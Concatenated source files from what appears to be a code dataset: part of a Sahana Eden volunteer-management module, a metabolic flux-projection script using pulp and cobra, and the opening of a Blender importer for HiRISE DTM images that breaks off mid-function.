is_admin = auth.s3_has_role(ADMIN)
root_org = auth.root_org()
if is_admin:
filter_opts = ()
elif root_org:
filter_opts = (root_org, None)
else:
filter_opts = (None,)
# ---------------------------------------------------------------------
# Volunteer Award
#
tablename = "vol_award"
define_table(tablename,
Field("name",
label = T("Name")),
# Only included in order to be able to set
# realm_entity to filter appropriately
self.org_organisation_id(default = root_org,
readable = is_admin,
writable = is_admin,
),
s3_comments(label=T("Description"),
comment=None),
*s3_meta_fields())
crud_strings[tablename] = Storage(
label_create = T("Create Award"),
title_display = T("Award"),
title_list = T("Award"),
title_update = T("Edit Award"),
title_upload = T("Import Awards"),
label_list_button = T("List Awards"),
label_delete_button = T("Delete Award"),
msg_record_created = T("Award added"),
msg_record_modified = T("Award updated"),
msg_record_deleted = T("Award deleted"),
msg_list_empty = T("No Awards found"))
comment = S3AddResourceLink(c = "vol",
f = "award",
label = crud_strings[tablename].label_create,
title = T("Award"),
)
represent = S3Represent(lookup=tablename)
award_id = S3ReusableField("award_id", "reference %s" % tablename,
label = T("Award"),
requires = IS_EMPTY_OR(
IS_ONE_OF(db,
"vol_award.id",
represent,
filterby="organisation_id",
filter_opts=filter_opts)),
represent = represent,
comment = comment
)
# ---------------------------------------------------------------------
# Volunteers <> Awards link table
#
tablename = "vol_volunteer_award"
define_table(tablename,
self.pr_person_id(empty=False),
award_id(),
s3_date(),
s3_comments(),
*s3_meta_fields())
crud_strings[tablename] = Storage(
label_create = T("Create Award"),
title_display = T("Award"),
title_list = T("Award"),
title_update = T("Edit Award"),
title_upload = T("Import Awards"),
label_list_button = T("List Awards"),
label_delete_button = T("Delete Award"),
msg_record_created = T("Award added"),
msg_record_modified = T("Award updated"),
msg_record_deleted = T("Award deleted"),
msg_list_empty = T("No Awards found"))
self.configure(tablename,
context = {"person": "person_id"},
)
# Pass names back to global scope (s3.*)
return dict()
# =============================================================================
class S3VolunteerClusterModel(S3Model):
names = ("vol_cluster_type",
"vol_cluster",
"vol_cluster_position",
"vol_volunteer_cluster",
)
def model(self):
T = current.T
db = current.db
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
# ---------------------------------------------------------------------
# Volunteer Cluster
tablename = "vol_cluster_type"
define_table(tablename,
Field("name", length=255, unique=True,
label = T("Name")),
*s3_meta_fields())
crud_strings[tablename] = Storage(
label_create = T("Create Volunteer Cluster Type"),
title_display = T("Volunteer Cluster Type"),
title_list = T("Volunteer Cluster Type"),
title_update = T("Edit Volunteer Cluster Type"),
title_upload = T("Import Volunteer Cluster Types"),
label_list_button = T("List Volunteer Cluster Types"),
label_delete_button = T("Delete Volunteer Cluster Type"),
msg_record_created = T("Volunteer Cluster Type added"),
msg_record_modified = T("Volunteer Cluster Type updated"),
msg_record_deleted = T("Volunteer Cluster Type deleted"),
msg_list_empty = T("No Volunteer Cluster Types"))
comment = S3AddResourceLink(c = "vol",
f = "cluster_type",
vars = dict(child = "vol_cluster_type_id",
parent = "volunteer_cluster"),
label = crud_strings[tablename].label_create,
title = T("Volunteer Cluster Type"),
)
represent = S3Represent(lookup=tablename)
vol_cluster_type_id = S3ReusableField("vol_cluster_type_id", "reference %s" % tablename,
label = T("Volunteer Cluster Type"),
requires = IS_EMPTY_OR(
IS_ONE_OF(db,
"vol_cluster_type.id",
represent)),
represent = represent,
comment = comment
)
# ---------------------------------------------------------------------
# Volunteer Cluster
tablename = "vol_cluster"
define_table(tablename,
vol_cluster_type_id(),
Field("name", length=255, unique=True,
label = T("Name")),
*s3_meta_fields())
crud_strings[tablename] = Storage(
label_create = T("Create Volunteer Cluster"),
title_display = T("Volunteer Cluster"),
title_list = T("Volunteer Cluster"),
title_update = T("Edit Volunteer Cluster"),
title_upload = T("Import Volunteer Clusters"),
label_list_button = T("List Volunteer Clusters"),
label_delete_button = T("Delete Volunteer Cluster"),
msg_record_created = T("Volunteer Cluster added"),
msg_record_modified = T("Volunteer Cluster updated"),
msg_record_deleted = T("Volunteer Cluster deleted"),
msg_list_empty = T("No Volunteer Clusters"))
comment = S3AddResourceLink(c = "vol",
f = "cluster",
vars = dict(child = "vol_cluster_id",
parent = "volunteer_cluster"),
label = crud_strings[tablename].label_create,
title = T("Volunteer Cluster"),
)
represent = S3Represent(lookup=tablename)
vol_cluster_id = S3ReusableField("vol_cluster_id", "reference %s" % tablename,
label = T("Volunteer Cluster"),
requires = IS_EMPTY_OR(
IS_ONE_OF(db,
"vol_cluster.id",
represent)),
represent = represent,
comment = comment
)
# ---------------------------------------------------------------------
# Volunteer Group Position
#
tablename = "vol_cluster_position"
define_table(tablename,
Field("name", length=255, unique=True,
label = T("Name")),
*s3_meta_fields())
crud_strings[tablename] = Storage(
label_create = T("Create Volunteer Cluster Position"),
title_display = T("Volunteer Cluster Position"),
title_list = T("Volunteer Cluster Position"),
title_update = T("Edit Volunteer Cluster Position"),
title_upload = T("Import Volunteer Cluster Positions"),
label_list_button = T("List Volunteer Cluster Positions"),
label_delete_button = T("Delete Volunteer Cluster Position"),
msg_record_created = T("Volunteer Cluster Position added"),
msg_record_modified = T("Volunteer Cluster Position updated"),
msg_record_deleted = T("Volunteer Cluster Position deleted"),
msg_list_empty = T("No Volunteer Cluster Positions"))
comment = S3AddResourceLink(c = "vol",
f = "cluster_position",
vars = dict(child = "vol_cluster_position_id",
parent = "volunteer_cluster"),
label = crud_strings[tablename].label_create,
title = T("Volunteer Cluster Position"),
)
represent = S3Represent(lookup=tablename)
vol_cluster_position_id = S3ReusableField("vol_cluster_position_id", "reference %s" % tablename,
label = T("Volunteer Cluster Position"),
requires = IS_EMPTY_OR(
IS_ONE_OF(db,
"vol_cluster_position.id",
represent)),
represent = represent,
comment = comment
)
# ---------------------------------------------------------------------
# Volunteer Cluster Link Table
cluster_type_filter = '''
$.filterOptionsS3({
'trigger':'vol_cluster_type_id',
'target':'vol_cluster_id',
'lookupKey':'vol_cluster_type_id',
'lookupPrefix':'vol',
'lookupResource':'cluster',
})'''
tablename = "vol_volunteer_cluster"
define_table(tablename,
self.hrm_human_resource_id(ondelete = "CASCADE"),
vol_cluster_type_id(script = cluster_type_filter), # This field is ONLY here to provide a filter
vol_cluster_id(readable=False,
writable=False),
vol_cluster_position_id(readable=False,
writable=False),
*s3_meta_fields())
# Pass names back to global scope (s3.*)
return dict(vol_cluster_type_id = vol_cluster_type_id,
vol_cluster_id = vol_cluster_id,
)
# =====================================================================
@staticmethod
def defaults():
"""
Return safe defaults for model globals, this will be called instead
of model() in case the model has been deactivated in
deployment_settings.
"""
return dict(
vol_cluster_id = S3ReusableField("vol_cluster_id", "integer",
readable=False,
writable=False),
)
# =============================================================================
def vol_service_record(r, **attr):
"""
Generate a Volunteer Service Record
"""
record = r.record
if record.type != 2:
# Only relevant to volunteers
return None
T = current.T
db = current.db
ptable = db.pr_person
person_id = record.person_id
person = db(ptable.id == person_id).select(ptable.pe_id,
ptable.first_name,
ptable.middle_name,
ptable.last_name,
ptable.comments,
limitby=(0, 1),
).first()
vol_name = s3_fullname(person)
def callback(r):
# Header
s3db = current.s3db
otable = db.org_organisation
org_id = record.organisation_id
org = db(otable.id == org_id).select(otable.name,
otable.acronym,
otable.logo,
limitby=(0, 1),
).first()
org_name = org.name
logo = org.logo
if logo:
logo = s3db.org_organisation_logo(org)
elif current.deployment_settings.get_org_branches():
root_org = current.cache.ram(
# Common key with auth.root_org
"root_org_%s" % org_id,
lambda: s3db.org_root_organisation(org_id),
time_expire=120
)
logo = s3db.org_organisation_logo(root_org)
innerTable = TABLE(TR(TH(vol_name)),
TR(TD(org_name)))
person_details = TABLE(TR(TD(logo),
TD(innerTable)
))
pe_id = person.pe_id
# Photo
itable = s3db.pr_image
query = (itable.pe_id == pe_id) & \
(itable.profile == True)
image = db(query).select(itable.image,
limitby=(0, 1)).first()
if image:
image = image.image
size = (160, None)
image = s3db.pr_image_represent(image, size=size)
size = s3db.pr_image_size(image, size)
url = URL(c="default",
f="download",
args=image)
avatar = IMG(_src=url,
_width=size[0],
_height=size[1],
)
person_details[0].append(TD(avatar))
# Contact Details
contact_details = DIV()
# Addresses
addrtable = s3db.pr_address
ltable = db.gis_location
query = (addrtable.pe_id == pe_id) & \
(addrtable.location_id == ltable.id)
addresses = db(query).select(addrtable.type,
ltable.addr_street,
ltable.L3,
ltable.L2,
ltable.L1,
orderby = addrtable.type,
limitby=(0, 2))
address_list = []
for address in addresses:
_location = address["gis_location"]
address = TABLE(TR(TH(addrtable.type.represent(address["pr_address"].type))),
TR(_location.addr_street),
TR(_location.L3),
TR(_location.L2),
TR(_location.L1),
)
address_list.append(address)
# Contacts
ctable = s3db.pr_contact
contacts = db(ctable.pe_id == pe_id).select(ctable.contact_method,
ctable.value,
orderby = ctable.priority,
limitby=(0, 3))
contact_list = TABLE()
contact_represent = ctable.contact_method.represent
for contact in contacts:
contact_list.append(TH(contact_represent(contact.contact_method)))
contact_list.append(contact.value)
# Emergency Contact
#ectable = s3db.pr_contact_emergency
#emergency = db(ectable.pe_id == pe_id).select(ectable.name,
# ectable.relationship,
# ectable.phone,
# limitby=(0, 1)).first()
#if emergency:
# econtact = TABLE(TR(TH(T("Emergency Contact"))),
# TR(emergency.name),
# TR(emergency.relationship),
# TR(emergency.phone),
# )
#else:
# econtact = TABLE()
contact_row = TR()
if len(address_list) > 0:
contact_row.append(TD(address_list[0]))
if len(address_list) > 1:
contact_row.append(TD(address_list[1]))
contact_row.append(contact_list)
#contact_row.append(econtact)
# Identity
idtable = s3db.pr_identity
query = (idtable.person_id == person_id) & \
(idtable.deleted == False)
rows = db(query).select(idtable.type,
idtable.value,
idtable.valid_until)
id_row = TR()
for identity in rows:
id_row.append(TABLE(TR(TH(idtable.type.represent(identity.type))),
TR(identity.value),
TR(identity.valid_until),
))
# Comments:
comments = person.comments or ""
if comments:
comments = TABLE(TR(TH(T("Comments"))),
TR(comments))
# Training Courses
hours = {}
ttable = s3db.hrm_training
ctable = s3db.hrm_course
query = (ttable.deleted == False) & \
(ttable.person_id == person_id) & \
(ttable.course_id == ctable.id)
rows = db(query).select(ctable.name,
ttable.date,
ttable.hours,
orderby = ~ttable.date)
date_represent = ttable.date.represent
for row in rows:
_row = row["hrm_training"]
_date = _row.date
hours[_date.date()] = dict(course = row["hrm_course"].name,
date = date_represent(_date),
hours = _row.hours or "",
)
courses = TABLE(TR(TH(T("Date")),
TH(T("Training")),
TH(T("Hours"))))
        total = 0
        # list the course dates in chronological order
        for hour in sorted(hours):
_hour = hours[hour]
__hours = _hour["hours"] or 0
courses.append(TR(_hour["date"],
_hour["course"],
str(__hours)
))
total += __hours
if total > 0:
courses.append(TR(TD(""), TD("Total"), TD("%d" % total)))
# Programme Hours
# - grouped by Programme/Role
programmes = OrderedDict()
hrstable = s3db.hrm_programme_hours
ptable = db.hrm_programme
jtable = db.hrm_job_title
query = (hrstable.deleted == False) & \
(hrstable.training == False) & \
(hrstable.person_id == person_id) & \
(hrstable.programme_id == ptable.id)
left = jtable.on(hrstable.job_title_id == jtable.id)
rows = db(query).select(hrstable.date,
hrstable.hours,
jtable.name,
ptable.name,
ptable.name_long,
left=left,
orderby = ~hrstable.date)
NONE = current.messages["NONE"]
for row in rows:
_row = row["hrm_programme_hours"]
_date = _row.date
hours = _row.hours or 0
role = row["hrm_job_title"]["name"] or NONE
prow = row["hrm_programme"]
if prow.name_long:
programme = prow.name_long
else:
programme = prow.name
if programme not in programmes:
programmes[programme] = OrderedDict()
p = programmes[programme]
if role in p:
p[role]["end_date"] = _date
p[role]["hours"] += hours
else:
p[role] = dict(start_date = _date,
end_date = _date,
hours = hours,
)
date_represent = hrstable.date.represent
programme = TABLE(TR(TH(T("Start Date")),
TH(T("End Date")),
TH(T("Work on Program")),
TH(T("Role")),
TH(T("Hours"))))
total = 0
for p in programmes:
_p = programmes[p]
for r in _p:
role = _p[r]
hours = role["hours"]
total += hours
programme.append(TR(date_represent(role["start_date"]),
date_represent(role["end_date"]),
p,
r,
str(hours)
))
if total > 0:
programme.append(TR("", "", "", TD("Total"), TD("%d" % total)))
# Space for the printed document to be signed
datestamp = S3DateTime.date_represent(current.request.now)
datestamp = "%s: %s" % (T("Date Printed"), datestamp)
manager = T("Branch Coordinator")
signature = TABLE(TR(TH(T("Signature"))),
TR(TD()),
TR(TD(manager)),
TR(TD(datestamp)))
output = DIV(TABLE(TR(TH(T("Volunteer Service Record")))),
person_details,
TABLE(contact_row),
TABLE(id_row),
TABLE(comments),
TABLE(courses),
TABLE(programme),
TABLE(signature),
)
return output
from s3.s3export import S3Exporter
exporter = S3Exporter().pdf
return exporter(r.resource,
request = r,
method = "list",
pdf_title = "%s - %s" % \
(vol_name, T("Volunteer Service Record")),
pdf_table_autogrow = "B",
pdf_callback = callback,
**attr
)
# END =========================================================================
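# Hypothetical wiring sketch (not part of this module): in Sahana Eden the
# service record is typically exposed as a custom REST method on the
# hrm_human_resource resource, along the lines of:
#
#   current.s3db.set_method("hrm", "human_resource",
#                           method="form",
#                           action=vol_service_record)
#
# The exact prefix/method name is deployment-specific; treat this as an
# assumption, not as the canonical registration.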
| mit | 3,607,100,593,541,855,700 | 41.005831 | 117 | 0.420391 | false | 5.100177 | false | false | false |
dandanvidi/in-vivo-enzyme-kinetics | scripts/handle_fluxomics.py | 3 | 7038 | # -*- coding: utf-8 -*-
"""
Created on Thu Apr 14 17:15:01 2016
@author: dan
"""
import re, pulp
import pandas as pd
import matplotlib.pyplot as plt
from cobra.io.sbml import create_cobra_model_from_sbml_file
from cobra.manipulation.modify import convert_to_irreversible
#from ..scripts.despine_axes import despine
def despine(ax, fontsize=15):
ax.tick_params(right=0, top=0, direction='out', labelsize=fontsize)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.set_xlabel(ax.get_xlabel(), size=15)
ax.set_ylabel(ax.get_ylabel(), size=15)
#%%
rid_mapping = pd.DataFrame.from_csv("../source/rid_mapping_cobra_2_Gerosa.csv")
MFA = pd.DataFrame.from_csv('../source/mmol_gCDW_hr_[Gerosa et al 2015].csv',
index_col=1)
MFA_std = pd.DataFrame.from_csv('../source/mmol_gCDW_hr_stdev_[Gerosa et al 2015].csv',
index_col=1)
conditions = pd.DataFrame.from_csv("../data/conditions.csv")
conditions = conditions[conditions.media_key>0]
conditions.sort_values('growth rate Gerosa [h-1]', inplace=True)
cs = conditions.index
#%%
measured_flux = pd.DataFrame(columns=cs, index=rid_mapping.index)
measured_flux_stdev = pd.DataFrame(columns=cs, index=rid_mapping.index)
for row in MFA.iterrows():
if not re.findall("[+-]", row[0]):
for r in row[0].split(';'):
cobra_reactions = rid_mapping[rid_mapping['gerosa_reaction_id']==r]
for r_cobra in cobra_reactions.index:
v = row[1]
measured_flux.loc[r_cobra] = v
measured_flux_stdev.loc[r_cobra] = MFA_std.loc[row[0]]
measured_flux.dropna(inplace=True)
measured_flux_stdev.dropna(inplace=True)
#%%
model = create_cobra_model_from_sbml_file('../source/iJO1366.xml')
all_reactions = map(str, model.reactions)
all_metabolites = map(str, model.metabolites)
mmol_gCDW_h = pd.DataFrame(columns=cs, index=measured_flux.index)
for c in cs:
cobra_c = conditions.loc[c, 'media_key']
gr = conditions.loc[c, 'growth rate Gerosa [h-1]']
flux_meas = measured_flux[c]
flux_stderr = measured_flux_stdev[c]
# load fresh copy of model
model = create_cobra_model_from_sbml_file('../source/iJO1366.xml')
# redefine sole carbon source uptake reaction in mmol/gr/h
model.reactions.get_by_id('EX_glc_e').lower_bound = 0
model.reactions.get_by_id('EX_' + cobra_c + '_e').lower_bound = -1000
# set growth rate according to measurements
biomass = "Ec_biomass_iJO1366_WT_53p95M"
growth_rate = model.reactions.get_by_id(biomass)
growth_rate.upper_bound = gr
growth_rate.lower_bound = gr
bounds_df = pd.DataFrame(index=all_reactions,columns=['lb','ub'])
m = model.to_array_based_model()
bounds_df.loc[all_reactions, 'lb'] = m.lower_bounds
bounds_df.loc[all_reactions, 'ub'] = m.upper_bounds
# initialize LP problem
pulp_solver = pulp.CPLEX(msg=0)
lp = pulp.LpProblem("MOMA", pulp.LpMinimize)
v_pred = pulp.LpVariable.dicts('v_pred', all_reactions)
v_meas = pulp.LpVariable.dicts('v_meas', all_reactions)
v_resid = pulp.LpVariable.dicts('residual', all_reactions)
# add flux bounds
for i in all_reactions:
lp += (v_pred[i] >= bounds_df.loc[i, 'lb']), 'lower_bound_%s' % i
lp += (v_pred[i] <= bounds_df.loc[i, 'ub']), 'upper_bound_%s' % i
# add constraint for each measured reaction i:
# |v_meas[i] - flux_meas[i]| <= flux_stderr[i]
# v_resid[i] >= |v_pred[i] - v_meas[i]|
for i in flux_meas.index:
lp += (v_meas[i] <= flux_meas[i] + flux_stderr[i]), 'measured_upper_%s' % i
lp += (v_meas[i] >= flux_meas[i] - flux_stderr[i]), 'measured_lower_%s' % i
lp += (v_pred[i] - v_resid[i] <= v_meas[i]), 'abs_diff_upper_%s' % i
lp += (-v_pred[i] - v_resid[i] <= -v_meas[i]), 'abs_diff_lower_%s' % i
# Some reactions in Gerosa et al. 2015 share constraints with other reactions
    # here we manually constrain their fluxes according to measurements.
# Acetate exchange
lp += (v_meas['ACt2rpp'] + v_meas['ACS'] <= MFA.loc['PTAr+ACS', c] + MFA_std.loc['PTAr+ACS', c])
lp += (v_meas['ACt2rpp'] + v_meas['ACS'] >= MFA.loc['PTAr+ACS', c] - MFA_std.loc['PTAr+ACS', c])
# PFK/FBP reversible reaction
lp += (v_meas['PFK'] - v_meas['FBP'] <= MFA.loc['PFK-FBP', c] + MFA_std.loc['PFK-FBP', c])
lp += (v_meas['PFK'] - v_meas['FBP'] >= MFA.loc['PFK-FBP', c] - MFA_std.loc['PFK-FBP', c])
# MDH/MQO alternative
lp += (v_meas['MDH'] + v_meas['MDH2'] <= MFA.loc['MDH+MQO', c] + MFA_std.loc['MDH+MQO', c])
lp += (v_meas['MDH'] + v_meas['MDH2'] >= MFA.loc['MDH+MQO', c] - MFA_std.loc['MDH+MQO', c])
# ME alternative
lp += (v_meas['ME1'] + v_meas['ME2'] <= MFA.loc['ME1+ME2', c] + MFA_std.loc['ME1+ME2', c])
lp += (v_meas['ME1'] + v_meas['ME2'] >= MFA.loc['ME1+ME2', c] - MFA_std.loc['ME1+ME2', c])
# set the objective to minimize sum_i abs_diff[i]
objective = pulp.lpSum(v_resid.values())
lp.setObjective(objective)
# add stoichiometric constraints for all internal metabolites: S_int * v = 0
for i,j in enumerate(m.S):
row = [l * v_pred[all_reactions[k]] for k,l in zip(j.rows[0],j.data[0])]
lp += (pulp.lpSum(row) == 0), 'mass_balance_%s' % all_metabolites[i]
lp.solve()
# append fluxes to new dataframe
MEAS_FLUX_L = 'measured fluxes from Gerosa et al.'
MEAS_STDEV_L = 'standard deviation'
PRED_FLUX_L = 'projected fluxes'
RESID_L = 'residual'
fluxes_df = pd.DataFrame(index=all_reactions)
fluxes_df.loc[flux_meas.index, MEAS_FLUX_L] = flux_meas
fluxes_df.loc[flux_meas.index, MEAS_STDEV_L] = flux_stderr
fluxes_df.loc[all_reactions, PRED_FLUX_L] = \
map(lambda i: pulp.value(v_pred[i]), all_reactions)
fluxes_df.loc[measured_flux.index, RESID_L] = \
map(lambda i: pulp.value(v_resid[i]), measured_flux.index)
mmol_gCDW_h[c] = fluxes_df.loc[measured_flux.index, PRED_FLUX_L]
#%%
# normalize all fluxes to the biomass flux (i.e. set it to 1)
fluxes_df /= pulp.value(v_pred[biomass])
fig = plt.figure(figsize=(6,6))
ax = plt.axes()
fluxes_df.plot(kind='scatter', x=MEAS_FLUX_L, y=PRED_FLUX_L,
xerr=MEAS_STDEV_L, ax=ax, linewidth=0, s=20,
color=(0.7,0.2,0.5))
xlim, ylim = (ax.get_ylim(), ax.get_ylim())
plt.axis('equal')
plt.plot(xlim, ylim)
plt.xlim(xlim)
plt.ylim(ylim)
despine(ax)
ax.set_title(c, size=15)
for i in flux_meas.index:
xy = fluxes_df.loc[i, [MEAS_FLUX_L, PRED_FLUX_L]]
if fluxes_df.loc[i, RESID_L] > 2:
ax.annotate(i, xy,
fontsize=10, color='darkslategrey')
fig.savefig('../res/flux_projections/flux_projection_on_%s.pdf' %c)
mmol_gCDW_h.to_csv('../data/flux projections[mmol_gCDW_h].csv')
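# ----------------------------------------------------------------------------
# Illustrative sketch (not part of the original script): the residual variables
# used above linearize |v_pred - v_meas| for the LP; minimizing sum(residual)
# under the two inequalities drives each residual down to the absolute
# difference. A minimal standalone pulp example of the same trick:
#
#   import pulp
#   prob = pulp.LpProblem("abs_demo", pulp.LpMinimize)
#   x = pulp.LpVariable("x")      # free variable
#   r = pulp.LpVariable("r")      # residual, ends up >= |x - 3|
#   prob += ( x - r <= 3)
#   prob += (-x - r <= -3)
#   prob += (x >= 5)              # force x away from the target value 3
#   prob.setObjective(r)
#   prob.solve()                  # optimal r == 2 == |5 - 3|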
| mit | -7,854,915,232,658,990,000 | 39.217143 | 100 | 0.603581 | false | 2.68626 | false | false | false |
PLyczkowski/Sticky-Keymap | 2.74/scripts/addons/io_convert_image_to_mesh_img/import_img.py | 8 | 23824 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
"""
This script can import a HiRISE DTM .IMG file.
"""
import bpy
from bpy.props import *
from struct import pack, unpack
import os
import queue, threading
class image_properties:
""" keeps track of image attributes throughout the hirise_dtm_importer class """
def __init__(self, name, dimensions, pixel_scale):
self.name( name )
self.dims( dimensions )
self.processed_dims( dimensions )
self.pixel_scale( pixel_scale )
def dims(self, dims=None):
if dims is not None:
self.__dims = dims
return self.__dims
def processed_dims(self, processed_dims=None):
if processed_dims is not None:
self.__processed_dims = processed_dims
return self.__processed_dims
def name(self, name=None):
if name is not None:
self.__name = name
return self.__name
def pixel_scale(self, pixel_scale=None):
if pixel_scale is not None:
self.__pixel_scale = pixel_scale
return self.__pixel_scale
class hirise_dtm_importer(object):
""" methods to understand/import a HiRISE DTM formatted as a PDS .IMG """
def __init__(self, context, filepath):
self.__context = context
self.__filepath = filepath
self.__ignore_value = 0x00000000
self.__bin_mode = 'BIN6'
self.scale( 1.0 )
self.__cropXY = False
def bin_mode(self, bin_mode=None):
        if bin_mode is not None:
self.__bin_mode = bin_mode
return self.__bin_mode
def scale(self, scale=None):
if scale is not None:
self.__scale = scale
return self.__scale
def crop(self, widthX, widthY, offX, offY):
self.__cropXY = [ widthX, widthY, offX, offY ]
return self.__cropXY
############################################################################
## PDS Label Operations
############################################################################
def parsePDSLabel(self, labelIter, currentObjectName=None, level = ""):
# Let's parse this thing... semi-recursively
## I started writing this caring about everything in the PDS standard but ...
## it's a mess and I only need a few things -- thar be hacks below
## Mostly I just don't care about continued data from previous lines
label_structure = []
# When are we done with this level?
endStr = "END"
if not currentObjectName is None:
endStr = "END_OBJECT = %s" % currentObjectName
line = ""
while not line.rstrip() == endStr:
line = next(labelIter)
# Get rid of comments
comment = line.find("/*")
if comment > -1:
line = line[:comment]
# Take notice of objects
if line[:8] == "OBJECT =":
objName = line[8:].rstrip()
label_structure.append(
(
objName.lstrip().rstrip(),
self.parsePDSLabel(labelIter, objName.lstrip().rstrip(), level + " ")
)
)
elif line.find("END_OBJECT =") > -1:
pass
elif len(line.rstrip().lstrip()) > 0:
key_val = line.split(" = ", 2)
if len(key_val) == 2:
label_structure.append( (key_val[0].rstrip().lstrip(), key_val[1].rstrip().lstrip()) )
return label_structure
# There has got to be a better way in python?
def iterArr(self, label):
for line in label:
yield line
def getPDSLabel(self, img):
# Just takes file and stores it into an array for later use
label = []
        done = False
# Grab label into array of lines
while not done:
line = str(img.readline(), 'utf-8')
if line.rstrip() == "END":
done = True
label.append(line)
return (label, self.parsePDSLabel(self.iterArr(label)))
def getLinesAndSamples(self, label):
""" uses the parsed PDS Label to get the LINES and LINE_SAMPLES parameters
from the first object named "IMAGE" -- is hackish
"""
for obj in label:
if obj[0] == "IMAGE":
return self.getLinesAndSamples(obj[1])
if obj[0] == "LINES":
lines = int(obj[1])
if obj[0] == "LINE_SAMPLES":
line_samples = int(obj[1])
return ( line_samples, lines )
def getValidMinMax(self, label):
""" uses the parsed PDS Label to get the VALID_MINIMUM and VALID_MAXIMUM parameters
from the first object named "IMAGE" -- is hackish
"""
for obj in label:
if obj[0] == "IMAGE":
return self.getValidMinMax(obj[1])
if obj[0] == "VALID_MINIMUM":
vmin = float(obj[1])
if obj[0] == "VALID_MAXIMUM":
vmax = float(obj[1])
return vmin, vmax
def getMissingConstant(self, label):
""" uses the parsed PDS Label to get the MISSING_CONSTANT parameter
from the first object named "IMAGE" -- is hackish
"""
for obj in label:
if obj[0] == "IMAGE":
return self.getMissingConstant(obj[1])
if obj[0] == "MISSING_CONSTANT":
bit_string_repr = obj[1]
# This is always the same for a HiRISE image, so we are just checking it
# to be a little less insane here. If someone wants to support another
# constant then go for it. Just make sure this one continues to work too
pieces = bit_string_repr.split("#")
if pieces[0] == "16" and pieces[1] == "FF7FFFFB":
ignore_value = unpack("f", pack("I", 0xFF7FFFFB))[0]
return ( ignore_value )
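    # Illustrative note (not part of the original source): the PDS label stores
    # MISSING_CONSTANT as a radix#digits# literal, e.g. "16#FF7FFFFB#". The
    # method above reinterprets those 32 bits as an IEEE-754 float:
    #
    #   >>> from struct import pack, unpack
    #   >>> unpack("f", pack("I", 0xFF7FFFFB))[0]
    #   # a huge negative sentinel, roughly -3.4028e+38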
############################################################################
## Image operations
############################################################################
def bin2(self, image_iter, bin2_method_type="SLOW"):
""" this is an iterator that: Given an image iterator will yield binned lines """
ignore_value = self.__ignore_value
img_props = next(image_iter)
# dimensions shrink as we remove pixels
processed_dims = img_props.processed_dims()
processed_dims = ( processed_dims[0]//2, processed_dims[1]//2 )
img_props.processed_dims( processed_dims )
# each pixel is larger as binning gets larger
pixel_scale = img_props.pixel_scale()
pixel_scale = ( pixel_scale[0]*2, pixel_scale[1]*2 )
img_props.pixel_scale( pixel_scale )
yield img_props
        # Take two lists [a1, a2, a3], [b1, b2, b3] and average them element-wise
        # into one list of [(a1+b1)/2, (a2+b2)/2, ...] as long as both values are not ignorable
        combine_fun = lambda a, b: (a + b)/2 if (a != ignore_value and b != ignore_value) else ignore_value
line_count = 0
ret_list = []
for line in image_iter:
if line_count == 1:
line_count = 0
tmp_list = list(map(combine_fun, line, last_line))
while len(tmp_list) > 1:
ret_list.append( combine_fun( tmp_list[0], tmp_list[1] ) )
del tmp_list[0:2]
yield ret_list
ret_list = []
else:
last_line = line
line_count += 1
def bin6(self, image_iter, bin6_method_type="SLOW"):
""" this is an iterator that: Given an image iterator will yield binned lines """
img_props = next(image_iter)
# dimensions shrink as we remove pixels
processed_dims = img_props.processed_dims()
processed_dims = ( processed_dims[0]//6, processed_dims[1]//6 )
img_props.processed_dims( processed_dims )
# each pixel is larger as binning gets larger
pixel_scale = img_props.pixel_scale()
pixel_scale = ( pixel_scale[0]*6, pixel_scale[1]*6 )
img_props.pixel_scale( pixel_scale )
yield img_props
if bin6_method_type == "FAST":
bin6_method = self.bin6_real_fast
else:
bin6_method = self.bin6_real
raw_data = []
line_count = 0
for line in image_iter:
raw_data.append( line )
line_count += 1
if line_count == 6:
yield bin6_method( raw_data )
line_count = 0
raw_data = []
def bin6_real(self, raw_data):
""" does a 6x6 sample of raw_data and returns a single line of data """
# TODO: make this more efficient
binned_data = []
# Filter out those unwanted hugely negative values...
IGNORE_VALUE = self.__ignore_value
base = 0
for i in range(0, len(raw_data[0])//6):
ints = (raw_data[0][base:base+6] +
raw_data[1][base:base+6] +
raw_data[2][base:base+6] +
raw_data[3][base:base+6] +
raw_data[4][base:base+6] +
raw_data[5][base:base+6] )
ints = [num for num in ints if num != IGNORE_VALUE]
# If we have all pesky values, return a pesky value
if not ints:
binned_data.append( IGNORE_VALUE )
else:
binned_data.append( sum(ints, 0.0) / len(ints) )
base += 6
return binned_data
def bin6_real_fast(self, raw_data):
""" takes a single value from each 6x6 sample of raw_data and returns a single line of data """
# TODO: make this more efficient
binned_data = []
base = 0
for i in range(0, len(raw_data[0])//6):
binned_data.append( raw_data[0][base] )
base += 6
return binned_data
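    # Illustrative comparison (not part of the original source) of the two 6x6
    # binning strategies above, per block of samples:
    #   bin6_real      -> mean of all samples in the block that are not the
    #                     ignore value (or the ignore value if none remain)
    #   bin6_real_fast -> simply the first sample of the block's first row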
def bin12(self, image_iter, bin12_method_type="SLOW"):
""" this is an iterator that: Given an image iterator will yield binned lines """
img_props = next(image_iter)
# dimensions shrink as we remove pixels
processed_dims = img_props.processed_dims()
processed_dims = ( processed_dims[0]//12, processed_dims[1]//12 )
img_props.processed_dims( processed_dims )
# each pixel is larger as binning gets larger
pixel_scale = img_props.pixel_scale()
pixel_scale = ( pixel_scale[0]*12, pixel_scale[1]*12 )
img_props.pixel_scale( pixel_scale )
yield img_props
if bin12_method_type == "FAST":
bin12_method = self.bin12_real_fast
else:
bin12_method = self.bin12_real
raw_data = []
line_count = 0
for line in image_iter:
raw_data.append( line )
line_count += 1
if line_count == 12:
yield bin12_method( raw_data )
line_count = 0
raw_data = []
def bin12_real(self, raw_data):
""" does a 12x12 sample of raw_data and returns a single line of data """
binned_data = []
# Filter out those unwanted hugely negative values...
filter_fun = lambda a: self.__ignore_value.__ne__(a)
base = 0
for i in range(0, len(raw_data[0])//12):
